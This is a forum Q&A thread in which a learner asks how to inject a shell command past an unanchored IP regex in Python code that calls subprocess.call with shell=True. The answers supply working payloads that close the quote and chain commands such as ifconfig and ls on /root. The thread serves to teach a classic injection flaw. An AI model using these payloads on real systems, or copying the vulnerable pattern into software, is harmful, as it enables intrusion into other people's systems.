# Python: subprocess.call injection

Tags: python, subprocess

I'm doing a home study and i've got the challenge of trying to insert a command injection into some Python code.

the trouble i'm having is with the check, cant seem to bypass it.

```
address = sys.argv[1]
if not re.match("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", address):
   return usage("Invalid argument")

subprocess.call("/bin/ping -c 3 '{0}'".format (address), shell = True)
```

cause the check above the subprocess checks if it' a valid IP address I can't manipulate it, and advise how to do this?

With kind regards,
Patrick

Comment: Looks like it's impossible. Regex check makes this command call safe from injections

Comment: @AndrewCherevatkin No, it doesn't. The regular expression isn't anchored, so it only checks for a valid *substring* within the purported address.

Answer (score 2, accepted):

You can use a valid ip address followed by a system command, eg :

```
127.0.0.1';/sbin/ifconfig;:'
```

If you want to include arguments, wrap `argv[1]` in double quotes :

```
"127.0.0.1';/bin/ls -al /root;'"
```

Comment: It's a little tricker than that, because the string is wrapped in quotes. You'd need something like `127.0.0.1';ifconfig;: '` to close and reopen the quotes, producing a valid command line.

Comment: Thanks guys!, you really helped me out there.. was about to throw the laptop against the wall :)